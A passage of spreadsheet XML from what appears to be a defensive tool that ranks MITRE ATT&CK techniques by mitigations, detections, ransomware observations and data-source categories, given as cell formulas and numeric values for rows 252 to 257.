        <f t="array" ref="AM252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD252)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN252" s="37">
        <v>0</v>
      </c>
      <c r="AO252" s="37">
        <v>3</v>
      </c>
      <c r="AP252" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ252" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>104.02853990476193</v>
      </c>
      <c r="AR252" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS252" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT252" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU25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7.5020385646258507</v>
      </c>
    </row>
    <row r="253" spans="1:47" ht="17">
      <c r="A253" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B253" s="37">
        <f t="shared" si="3"/>
        <v>422.53814271428575</v>
      </c>
      <c r="C253" s="37" t="s">
        <v>894</v>
      </c>
      <c r="D253" s="50" t="s">
        <v>886</v>
      </c>
      <c r="E253" s="37" t="s">
        <v>895</v>
      </c>
      <c r="F253" s="37">
        <v>1</v>
      </c>
      <c r="G253" s="37">
        <v>1</v>
      </c>
      <c r="H253" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I253" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J253" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K253" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L253" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M253" s="37">
        <v>0</v>
      </c>
      <c r="N253" s="56">
        <v>1</v>
      </c>
      <c r="O253" s="56">
        <v>26</v>
      </c>
      <c r="P253" s="56">
        <v>3</v>
      </c>
      <c r="Q253" s="56">
        <v>4</v>
      </c>
      <c r="R253" s="57" t="s">
        <v>896</v>
      </c>
      <c r="S253" s="57">
        <v>5</v>
      </c>
      <c r="T253" s="57" t="s">
        <v>897</v>
      </c>
      <c r="U253" s="57">
        <v>12</v>
      </c>
      <c r="V253" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.32380957142857147</v>
      </c>
      <c r="W253" s="37">
        <v>17</v>
      </c>
      <c r="X253" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y253" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z253" s="37">
        <v>34</v>
      </c>
      <c r="AA253" s="37">
        <v>0.34</v>
      </c>
      <c r="AB253" s="37">
        <v>0.34</v>
      </c>
      <c r="AC253" s="37"/>
      <c r="AD253" s="50" t="s">
        <v>898</v>
      </c>
      <c r="AE253" s="37" t="str" cm="1">
        <f t="array" ref="AE253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD253)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF253" s="37">
        <v>249</v>
      </c>
      <c r="AG253" s="37" t="str" cm="1">
        <f t="array" ref="AG253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD253)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH253" s="37">
        <v>249</v>
      </c>
      <c r="AI253" s="37" t="str" cm="1">
        <f t="array" ref="AI253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD253)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ253" s="37">
        <v>249</v>
      </c>
      <c r="AK253" s="37" t="str" cm="1">
        <f t="array" ref="AK253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD253)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL253" s="37">
        <v>249</v>
      </c>
      <c r="AM253" s="37" t="str" cm="1">
        <f t="array" ref="AM253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD253)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN253" s="37">
        <v>0</v>
      </c>
      <c r="AO253" s="37">
        <v>6</v>
      </c>
      <c r="AP253" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ253" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>140.84604757142858</v>
      </c>
      <c r="AR253" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS253" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT253" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU25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20.263721081632653</v>
      </c>
    </row>
    <row r="254" spans="1:47" ht="68">
      <c r="A254" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B254" s="37">
        <f t="shared" si="3"/>
        <v>133.46666666666667</v>
      </c>
      <c r="C254" s="37" t="s">
        <v>899</v>
      </c>
      <c r="D254" s="50" t="s">
        <v>886</v>
      </c>
      <c r="E254" s="37" t="s">
        <v>900</v>
      </c>
      <c r="F254" s="37">
        <v>1</v>
      </c>
      <c r="G254" s="37">
        <v>1</v>
      </c>
      <c r="H254" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I254" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J254" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K254" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L254" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M254" s="37">
        <v>0</v>
      </c>
      <c r="N254" s="56">
        <v>0</v>
      </c>
      <c r="O254" s="56">
        <v>0</v>
      </c>
      <c r="P254" s="56">
        <v>0</v>
      </c>
      <c r="Q254" s="56">
        <v>7</v>
      </c>
      <c r="R254" s="57"/>
      <c r="S254" s="57">
        <v>0</v>
      </c>
      <c r="T254" s="57" t="s">
        <v>901</v>
      </c>
      <c r="U254" s="57">
        <v>0</v>
      </c>
      <c r="V254" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W254" s="37">
        <v>0</v>
      </c>
      <c r="X254" s="37">
        <v>0</v>
      </c>
      <c r="Y254" s="37">
        <v>0</v>
      </c>
      <c r="Z254" s="37">
        <v>7</v>
      </c>
      <c r="AA254" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB254" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC254" s="37"/>
      <c r="AD254" s="50" t="s">
        <v>902</v>
      </c>
      <c r="AE254" s="37" t="str" cm="1">
        <f t="array" ref="AE254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD254)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF254" s="37">
        <v>250</v>
      </c>
      <c r="AG254" s="37" t="str" cm="1">
        <f t="array" ref="AG254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD254)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH254" s="37">
        <v>250</v>
      </c>
      <c r="AI254" s="37" t="str" cm="1">
        <f t="array" ref="AI254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD254)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ254" s="37">
        <v>250</v>
      </c>
      <c r="AK254" s="37" t="str" cm="1">
        <f t="array" ref="AK254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD254)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL254" s="37">
        <v>250</v>
      </c>
      <c r="AM254" s="37" t="str" cm="1">
        <f t="array" ref="AM254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD254)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN254" s="37">
        <v>0</v>
      </c>
      <c r="AO254" s="37"/>
      <c r="AP254" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ254" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>44.488888888888887</v>
      </c>
      <c r="AR254" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS254" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT254" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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55" spans="1:47" ht="68">
      <c r="A255" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B255" s="37">
        <f t="shared" si="3"/>
        <v>224.92876285714286</v>
      </c>
      <c r="C255" s="37" t="s">
        <v>903</v>
      </c>
      <c r="D255" s="50" t="s">
        <v>904</v>
      </c>
      <c r="E255" s="37"/>
      <c r="F255" s="37">
        <v>1</v>
      </c>
      <c r="G255" s="37">
        <v>1</v>
      </c>
      <c r="H255" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I255" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J255" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K255" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L255" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M255" s="37">
        <v>0</v>
      </c>
      <c r="N255" s="56">
        <v>0</v>
      </c>
      <c r="O255" s="56">
        <v>0</v>
      </c>
      <c r="P255" s="56">
        <v>0</v>
      </c>
      <c r="Q255" s="56">
        <v>0</v>
      </c>
      <c r="R255" s="57" t="s">
        <v>905</v>
      </c>
      <c r="S255" s="57">
        <v>4</v>
      </c>
      <c r="T255" s="57" t="s">
        <v>906</v>
      </c>
      <c r="U255" s="57">
        <v>9</v>
      </c>
      <c r="V255" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12380971428571429</v>
      </c>
      <c r="W255" s="37">
        <v>13</v>
      </c>
      <c r="X255" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y255" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z255" s="37">
        <v>0</v>
      </c>
      <c r="AA255" s="37">
        <v>0</v>
      </c>
      <c r="AB255" s="37">
        <v>0</v>
      </c>
      <c r="AC255" s="37"/>
      <c r="AD255" s="50" t="s">
        <v>907</v>
      </c>
      <c r="AE255" s="37" t="str" cm="1">
        <f t="array" ref="AE255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD255)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF255" s="37">
        <v>251</v>
      </c>
      <c r="AG255" s="37" t="str" cm="1">
        <f t="array" ref="AG255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD255)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH255" s="37">
        <v>251</v>
      </c>
      <c r="AI255" s="37" t="str" cm="1">
        <f t="array" ref="AI255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD255)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ255" s="37">
        <v>251</v>
      </c>
      <c r="AK255" s="37" t="str" cm="1">
        <f t="array" ref="AK255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD255)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL255" s="37">
        <v>251</v>
      </c>
      <c r="AM255" s="37" t="str" cm="1">
        <f t="array" ref="AM255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD255)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN255" s="37">
        <v>0</v>
      </c>
      <c r="AO255" s="37">
        <v>0</v>
      </c>
      <c r="AP255" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ255" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>74.97625428571429</v>
      </c>
      <c r="AR255" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS255" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT255" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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56" spans="1:47" ht="34">
      <c r="A256" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B256" s="37">
        <f t="shared" si="3"/>
        <v>206.60476190476192</v>
      </c>
      <c r="C256" s="37" t="s">
        <v>908</v>
      </c>
      <c r="D256" s="50" t="s">
        <v>904</v>
      </c>
      <c r="E256" s="37" t="s">
        <v>909</v>
      </c>
      <c r="F256" s="37">
        <v>1</v>
      </c>
      <c r="G256" s="37">
        <v>1</v>
      </c>
      <c r="H256" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I256" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J256" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K256" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L256" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M256" s="37">
        <v>0</v>
      </c>
      <c r="N256" s="56">
        <v>0</v>
      </c>
      <c r="O256" s="56">
        <v>0</v>
      </c>
      <c r="P256" s="56">
        <v>0</v>
      </c>
      <c r="Q256" s="56">
        <v>0</v>
      </c>
      <c r="R256" s="57" t="s">
        <v>910</v>
      </c>
      <c r="S256" s="57">
        <v>3</v>
      </c>
      <c r="T256" s="57" t="s">
        <v>911</v>
      </c>
      <c r="U256" s="57">
        <v>8</v>
      </c>
      <c r="V256" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W256" s="37">
        <v>11</v>
      </c>
      <c r="X256" s="37">
        <v>0.2</v>
      </c>
      <c r="Y256" s="37">
        <v>0.2</v>
      </c>
      <c r="Z256" s="37">
        <v>0</v>
      </c>
      <c r="AA256" s="37">
        <v>0</v>
      </c>
      <c r="AB256" s="37">
        <v>0</v>
      </c>
      <c r="AC256" s="37"/>
      <c r="AD256" s="50" t="s">
        <v>136</v>
      </c>
      <c r="AE256" s="37" t="str" cm="1">
        <f t="array" ref="AE256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD256)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF256" s="37">
        <v>252</v>
      </c>
      <c r="AG256" s="37" t="str" cm="1">
        <f t="array" ref="AG256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD256)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH256" s="37">
        <v>252</v>
      </c>
      <c r="AI256" s="37" t="str" cm="1">
        <f t="array" ref="AI256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD256)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ256" s="37">
        <v>252</v>
      </c>
      <c r="AK256" s="37" t="str" cm="1">
        <f t="array" ref="AK256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD256)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL256" s="37">
        <v>252</v>
      </c>
      <c r="AM256" s="37" t="str" cm="1">
        <f t="array" ref="AM256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD256)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN256" s="37">
        <v>0</v>
      </c>
      <c r="AO256" s="37">
        <v>0</v>
      </c>
      <c r="AP256" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ256" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>68.868253968253967</v>
      </c>
      <c r="AR256" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS256" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT256" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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57" spans="1:47" ht="34">
      <c r="A257" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B257" s="37">
        <f t="shared" si="3"/>
        <v>101.30000000000001</v>
      </c>
      <c r="C257" s="37" t="s">
        <v>912</v>
      </c>
      <c r="D257" s="50" t="s">
        <v>904</v>
      </c>
      <c r="E257" s="37" t="s">
        <v>913</v>
      </c>
      <c r="F257" s="37">
        <v>1</v>
      </c>
      <c r="G257" s="37">
        <v>1</v>
      </c>
      <c r="H257" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I257" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J257" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K257" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L257" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M257" s="37">
        <v>0</v>
      </c>
      <c r="N257" s="56">
        <v>0</v>
      </c>
      <c r="O257" s="56">
        <v>0</v>
      </c>
      <c r="P257" s="56">
        <v>0</v>
      </c>
      <c r="Q257" s="56">
        <v>0</v>
      </c>
      <c r="R257" s="57"/>
      <c r="S257" s="57"/>
      <c r="T257" s="57"/>
      <c r="U257" s="57"/>
      <c r="V257" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W257" s="37">
        <v>0</v>
      </c>
      <c r="X257" s="37">
        <v>0</v>
      </c>
      <c r="Y257" s="37">
        <v>0</v>
      </c>
      <c r="Z257" s="37">
        <v>0</v>
      </c>
      <c r="AA257" s="37">
        <v>0</v>
      </c>
      <c r="AB257" s="37">
        <v>0</v>
      </c>
      <c r="AC257" s="37"/>
      <c r="AD257" s="50" t="s">
        <v>914</v>
      </c>
      <c r="AE257" s="37" t="str" cm="1">
        <f t="array" ref="AE257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD257)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF257" s="37">
        <v>253</v>
      </c>
      <c r="AG257" s="37" t="str" cm="1">
        <f t="array" ref="AG257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD257)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH257" s="37">
        <v>253</v>
      </c>
      <c r="AI257" s="37" t="str" cm="1">
        <f t="array" ref="AI257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD257)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ257" s="37">
        <v>253</v>
      </c>
      <c r="AK257" s="37" t="str" cm="1">
        <f t="array" ref="AK257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD257)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL257" s="37">
        <v>253</v>
      </c>
      <c r="AM257" s="37" t="str" cm="1">
        <f t="array" ref="AM257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD257)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN257" s="37">
        <v>0</v>
      </c>
      <c r="AO257" s="37"/>
      <c r="AP257" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ257" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>33.766666666666673</v>
      </c>
      <c r="AR257" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS257" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT257" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
